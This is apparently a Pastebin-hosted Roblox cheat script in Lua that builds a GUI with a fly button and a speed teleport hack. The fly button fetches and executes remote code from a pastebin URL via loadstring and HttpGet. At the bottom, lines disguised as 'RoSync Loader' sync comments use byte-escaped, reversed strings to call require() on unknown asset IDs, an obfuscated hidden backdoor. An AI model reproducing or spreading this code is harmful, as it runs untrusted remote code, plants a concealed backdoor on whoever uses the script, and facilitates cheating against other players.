Advertisement
Legend_HandlesYT

Untitled

Jul 24th, 2021
1,970
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.52 KB | None | 0 0
  1. -- Made By Legend Handles GO SUB!
  2. -- Version: 1.2
  3.  
  4. local ScreenGui = Instance.new("ScreenGui")
  5. local main = Instance.new("Frame")
  6. local TextButton = Instance.new("TextButton")
  7. local TextLabel = Instance.new("TextLabel")
  8. local aimbot = Instance.new("TextButton")
  9. local ImageLabel = Instance.new("ImageLabel")
  10. local ImageLabel_2 = Instance.new("ImageLabel")
  11. local speed = Instance.new("TextButton")
  12.  
  13. --Properties:
  14.  
  15. ScreenGui.Parent = game.CoreGui
  16.  
  17. main.Name = "main"
  18. main.Parent = ScreenGui
  19. main.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
  20. main.BorderColor3 = Color3.fromRGB(0, 0, 0)
  21. main.BorderSizePixel = 4
  22. main.Position = UDim2.new(0.245916545, 0, 0.0620154962, 0)
  23. main.Size = UDim2.new(0, 755, 0, 397)
  24. main.Active = true
  25. main.Draggable = true
  26.  
  27. TextButton.Parent = main
  28. TextButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  29. TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
  30. TextButton.BorderSizePixel = 4
  31. TextButton.Position = UDim2.new(0.83178556, 0, -0.000484526157, 0)
  32. TextButton.Size = UDim2.new(0, 127, 0, 54)
  33. TextButton.Font = Enum.Font.SourceSans
  34. TextButton.Text = "CLOSE"
  35. TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
  36. TextButton.TextScaled = true
  37. TextButton.TextSize = 14.000
  38. TextButton.TextWrapped = true
  39.  
  40. TextLabel.Parent = main
  41. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  42. TextLabel.BackgroundTransparency = 1.000
  43. TextLabel.Size = UDim2.new(0, 620, 0, 53)
  44. TextLabel.Font = Enum.Font.Oswald
  45. TextLabel.Text = "Made By Legend Handles Go SUB!"
  46. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  47. TextLabel.TextScaled = true
  48. TextLabel.TextSize = 14.000
  49. TextLabel.TextWrapped = true
  50.  
  51. aimbot.Name = "aimbot"
  52. aimbot.Parent = main
  53. aimbot.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  54. aimbot.BorderColor3 = Color3.fromRGB(0, 0, 0)
  55. aimbot.BorderSizePixel = 4
  56. aimbot.Position = UDim2.new(0.14172186, 0, 0.191435769, 0)
  57. aimbot.Size = UDim2.new(0, 178, 0, 113)
  58. aimbot.Font = Enum.Font.TitilliumWeb
  59. aimbot.Text = "Fly :)"
  60. aimbot.TextColor3 = Color3.fromRGB(0, 0, 0)
  61. aimbot.TextScaled = true
  62. aimbot.TextSize = 14.000
  63. aimbot.TextWrapped = true
  64. aimbot.MouseButton1Down:connect(function()
  65. loadstring(game:HttpGet("https://pastebin.com/raw/UXmbai5q", true))()
  66. end)
  67.  
  68. ImageLabel.Parent = main
  69. ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  70. ImageLabel.BackgroundTransparency = 1.000
  71. ImageLabel.Position = UDim2.new(0, 0, 0.748110831, 0)
  72. ImageLabel.Size = UDim2.new(0, 100, 0, 100)
  73. ImageLabel.Image = "rbxassetid://6864604891"
  74.  
  75. ImageLabel_2.Parent = main
  76. ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  77. ImageLabel_2.BackgroundTransparency = 1.000
  78. ImageLabel_2.Position = UDim2.new(0.830463588, 0, 0.748110831, 0)
  79. ImageLabel_2.Size = UDim2.new(0, 100, 0, 100)
  80. ImageLabel_2.Image = "rbxassetid://6864604891"
  81.  
  82. speed.Name = "speed"
  83. speed.Parent = main
  84. speed.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  85. speed.BorderColor3 = Color3.fromRGB(0, 0, 0)
  86. speed.BorderSizePixel = 4
  87. speed.Position = UDim2.new(0.609271526, 0, 0.191435769, 0)
  88. speed.Size = UDim2.new(0, 178, 0, 113)
  89. speed.Font = Enum.Font.TitilliumWeb
  90. speed.Text = "Shift To Sprint"
  91. speed.TextColor3 = Color3.fromRGB(0, 0, 0)
  92. speed.TextScaled = true
  93. speed.TextSize = 14.000
  94. speed.TextWrapped = true
  95. speed.MouseButton1Down:connect(function()
  96. ShiftHeld = false
  97. local gcheck = true
  98. urspeed = -1 -- The lower it is the faster. So don't worry about it being minus 1
  99.  
  100.  
  101. function ChangeFaster(inputObject, gameProcessedEvent)
  102. if inputObject.KeyCode == Enum.KeyCode.Minus and gameProcessedEvent == false then
  103. urspeed = urspeed - 0.1
  104. end
  105. end
  106.  
  107.  
  108.  
  109. function ChangeSlower(inputObject, gameProcessedEvent)
  110. if inputObject.KeyCode == Enum.KeyCode.Equals and gameProcessedEvent == false then
  111. urspeed = urspeed + 0.1
  112. end
  113. end
  114.  
  115.  
  116.  
  117. function GChecker(inputObject, gameProcessedEvent)
  118. if inputObject.KeyCode == Enum.KeyCode.K and gameProcessedEvent == false then
  119. if gcheck == false then
  120. gcheck = true
  121. elseif gcheck == true then
  122. gcheck = false
  123. end
  124.  
  125. end
  126. end
  127.  
  128. game:GetService("UserInputService").InputBegan:connect(GChecker)
  129.  
  130.  
  131.  
  132. function PressShift(inputObject,gameProcessedEvent)
  133. if inputObject.KeyCode == Enum.KeyCode.LeftShift and gameProcessedEvent == false and gcheck == true then
  134. ShiftHeld = true
  135. end
  136. end
  137.  
  138. function ReleaseShift(inputObject,gameProcessed)
  139. if inputObject.KeyCode == Enum.KeyCode.LeftShift then
  140. ShiftHeld = false
  141. end
  142. end
  143.  
  144. game:GetService("UserInputService").InputBegan:connect(PressShift)
  145. game:GetService("UserInputService").InputEnded:connect(ReleaseShift)
  146. game:GetService("UserInputService").InputBegan:connect(ChangeFaster)
  147. game:GetService("UserInputService").InputBegan:connect(ChangeSlower)
  148.  
  149.  
  150. game:GetService('RunService').Stepped:connect(function()
  151. if ShiftHeld == true then
  152. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,urspeed)
  153. end
  154. end)
  155. end)
  156.  
  157. -- Scripts:
  158.  
  159. local function TVQSPY_fake_script() -- TextButton.LocalScript
  160. local script = Instance.new('LocalScript', TextButton)
  161.  
  162. script.Parent.MouseButton1Click:Connect(function()
  163. script.Parent.Parent.Visible = false
  164. end)
  165. end
  166. coroutine.wrap(TVQSPY_fake_script)()
  167. local function VWXPM_fake_script() -- nil.
  168. local script = Instance.new('Script', nil)
  169.  
  170.  
  171. --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5805259612)
  172. --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5747857292)
  173. --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5726091287)
  174. end
  175. coroutine.wrap(VWXPM_fake_script)()
  176.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement